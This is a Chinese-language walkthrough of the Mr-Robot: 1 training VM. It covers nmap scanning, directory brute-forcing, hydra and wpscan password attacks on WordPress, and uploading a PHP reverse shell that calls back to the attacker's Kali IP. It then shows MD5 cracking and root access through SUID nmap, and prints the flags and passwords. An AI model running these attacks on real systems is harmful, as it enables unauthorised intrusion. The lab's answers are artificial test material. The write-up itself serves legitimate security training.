红队渗透项目之Mr-Robot: 1

admin 2023年7月5日13:32:54评论8 views字数 3892阅读12分58秒阅读模式

简介

该项目是Leon Johnson作者精心制作的项目,目标是获取获得root权限并找到flag.txt文本信息,该项目作为OSCP考试培训必打的一个项目环境,该作者评定该环境为渗透中级水准难度。接下来不管是零基础学习渗透者,还是有些基础的渗透者,甚至是高水平的渗透人员读该的技巧和文章都能学习到一些红队知识。

该项目有始有终会用到 信息收集 -> WEB信息枚举 -> 暴力破解 -> wpscan枚举 -> worepress站getshell -> 内网信息收集 -> 提权 ,最终拿到flag.txt的过程,那么在八大模块中用到了一些小技巧都会在文章中演示出来,希望大家能动手也来和我一起学习渗透。

请注意:

本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。

一、信息收集

信息收集非常重要,有了信息才能知道下一步该如何进行,接下来将用nmap来演示信息收集:

1、nmap扫描存活IP

由于本项目环境是nat模式需要项目IP地址,扫描挖掘本地的IP地址信息:

红队渗透项目之Mr-Robot: 1

本机IP为:192.168.40.177。

发现本kali ip为40段!用40段进行全网段扫描:

nmap -sP 192.168.40.0/24

红队渗透项目之Mr-Robot: 1

Nmap scan report for localhost (192.168.40.191)

发现项目IP地址:192.168.40.191。

2、nmap全端口服务枚举

进行namp端口服务枚举:

nmap -p- 192.168.40.191

红队渗透项目之Mr-Robot: 1

得到开放的端口信息:

22/tcp  closed ssh
80/tcp open http
443/tcp open https

只开启了页面端口,接下来进行web页面枚举!

二、web信息枚举

1、web页面枚举

访问80端口,并查看源码:

http://192.168.40.191/

红队渗透项目之Mr-Robot: 1

发现是个js页面,没有什么可用的信息!

2、dirb爆破目录

利用dirb爆破目录信息枚举:

dirb http://192.168.40.191/

红队渗透项目之Mr-Robot: 1

发现多级目录,大致访问下发现如下信息;

wordpress博客登录界面:

http://192.168.40.191/wp-login.php

红队渗透项目之Mr-Robot: 1

需要查找登录账户密码

枚举出存在robots.txt:

http://192.168.40.191/admin/robots.txt

红队渗透项目之Mr-Robot: 1

发现fsocity.dic和key-1-of-3.txt

http://192.168.40.191/robots.txt

红队渗透项目之Mr-Robot: 1

3、获得flag1

wget http://192.168.40.191/key-1-of-3.txt 
ls
cat key-1-of-3.txt

红队渗透项目之Mr-Robot: 1

下载fsocity.dic

wget http://192.168.40.191/fsocity.dic
ls

红队渗透项目之Mr-Robot: 1

发现这就是个字典,改为txt文件方便后面利用:

mv fsocity.dic user.txt

红队渗透项目之Mr-Robot: 1

三、暴力破解

1、BP抓包分析

利用BP抓包分析:

http://10.211.55.49/wp-login.php

红队渗透项目之Mr-Robot: 1

发现boby:

log=1&pwd=1&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.40.191%2Fwp-admin%2F&testcookie=1

2、hydra爆破

运用hydra爆破字典,获取登录账户:

hydra -L user.txt -p test 192.168.40.191 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'
-L 用户名,运用字典user.txt
-p 单个密码,任拟
192.168.40.191 目标IP
http-post-form 表示破解是采用http的post方式提交的表单密码破解
F= 内容是表示错误猜解的返回信息提示

红队渗透项目之Mr-Robot: 1

成功爆破出用户名:Elliot

[80][http-post-form] host: 192.168.40.191   login: ELLIOT   password: test

四、wpscan枚举Elliot

1、wpscan爆破密码

wpscan -U Elliot -P user.txt --url http://192.168.40.191 -t 10000

红队渗透项目之Mr-Robot: 1

爆破需要一段时间,所以加入-t一万个线层进行爆破!

但是经过40分钟才可以爆破出来!

检查字典发现很多重复的,Linux sort 命令用于将文本文件内容加以排序:sort 可针对文本文件的内容,以行为单位来排序。https://www.runoob.com/linux/linux-comm-sort.html

2、sort去重

利用sort对字典进行去重:

sort user.txt | uniq > user1.txt
-u, --unique 配合-c,严格校验排序;不配合-c,则只输出一次排序结果

红队渗透项目之Mr-Robot: 1

红队渗透项目之Mr-Robot: 1

去重后的字典缩小至9KB!

继续用wpscan爆破密码:

wpscan -U Elliot -P user1.txt --url http://192.168.40.191

红队渗透项目之Mr-Robot: 1

红队渗透项目之Mr-Robot: 1

获得密码:

[SUCCESS] - Elliot / ER28-0652

通过不到一分钟就成功爆破了!

五、worepress站getshell

1、worepress页面信息枚举

worepress页面登录并查找上传模块:

http://192.168.40.191 /wp-login.php 
elliot
ER28-0652

红队渗透项目之Mr-Robot: 1

红队渗透项目之Mr-Robot: 1

成功登录!

发现上传入口

点击:Appearance->Add New->Upload Theme->文件上传

红队渗透项目之Mr-Robot: 1

2、漏洞利用

下载并配置PHP漏洞参数:

locate php-reverse-shell.php
cp /usr/share/webshells/php/php-reverse-shell.php .
gedit php-reverse-shell.php

红队渗透项目之Mr-Robot: 1

配置IP为本地kali地址,端口可不变

192.168.40.177
1234

红队渗透项目之Mr-Robot: 1

3、漏洞上传

在文件上传处上传php-reverse-shell

红队渗透项目之Mr-Robot: 1

然后点击模块:Media

点击刚上传的漏洞文件!

红队渗透项目之Mr-Robot: 1

右边获得上传点链接:

http://192.168.40.191/wp-content/uploads/2022/07/php-reverse-shell.php

红队渗透项目之Mr-Robot: 1

开启nc接收shell

nc -vlp 1234

红队渗透项目之Mr-Robot: 1

访问漏洞链接,获得反弹shell

http://192.168.40.191/wp-content/uploads/2022/07/php-reverse-shell.php

红队渗透项目之Mr-Robot: 1

成功获得反弹shell,但是这里获得的是/bin/sh的shell在执行

红队渗透项目之Mr-Robot: 1

发现是sh shell,sh不能走python shell

which python 
/bin/bash
python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + z
stty raw -echo
fg

红队渗透项目之Mr-Robot: 1

获得稳定的反弹shell!

六、内部信息收集

1、信息收集

进入robot,发现flag2和密匙:

cd /home/robot
ls
cat password.raw-md5

红队渗透项目之Mr-Robot: 1

获得以下信息:

flag需robot权限
robot密匙:c3fcd3d76192e4007dfb496cca67e13b

查看密码类型

hash-identifier

红队渗透项目之Mr-Robot: 1

发现是MD5密码

2、获得robot密码

在线解密:

https://www.somd5.com/

红队渗透项目之Mr-Robot: 1

获得密码:

abcdefghijklmnopqrstuvwxyz

七、提权

1、flag2

su进入获得flag2:

su robot
abcdefghijklmnopqrstuvwxyz

红队渗透项目之Mr-Robot: 1

获得flag2:

ls
cat key-2-of-3.txt

红队渗透项目之Mr-Robot: 1

flag2:822c73956184f694993bede3eb39f959

2、信息枚举

上传扫描脚本linpeas.sh

python -m SimpleHTTPServer 8081
cd /tmp
wget http://192.168.40.177:8081/linpeas.sh

红队渗透项目之Mr-Robot: 1

赋权并执行脚本:

chmod +x linpeas.sh
./linpeas.sh

红队渗透项目之Mr-Robot: 1

内核版本:

Linux version 3.13.0-55-generic 
Sudo version 1.8.9p5

红队渗透项目之Mr-Robot: 1

计划任务:

08 * * * * bitnami cd /opt/bitnami/stats && ./agent.bin --run -D

红队渗透项目之Mr-Robot: 1

nmap权限

-rwsr-xr-x 1 root root 493K Nov 13  2015 /usr/local/bin/nmap

红队渗透项目之Mr-Robot: 1

测试后内核漏洞37292.c,利用不了;计划任务 是个bin文件,提权不了

尝试nmap利用!

3、nmap提权

查看下有无安装nmap:

find / -perm -4000 2>/dev/null

红队渗透项目之Mr-Robot: 1

安装了nmap

利用priv升级漏洞进行bash提权

nmap --interactive
或/usr/local/bin/nmap --interactive ---即可得到交互式shell
!whoami
!/bin/bash -p

红队渗透项目之Mr-Robot: 1

成功获得root权限!

获得flag3:

cd /root
ls
cat key-3-of-3.txt

红队渗透项目之Mr-Robot: 1

flag3:04787ddef27c3dee1ee161b21670b4e4

本文作者:十七Seven, 转载请注明来自FreeBuf.COM


原文始发于微信公众号(白帽子程序员):红队渗透项目之Mr-Robot: 1

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年7月5日13:32:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   红队渗透项目之Mr-Robot: 1http://cn-sec.com/archives/1854981.html

发表评论

匿名网友 填写信息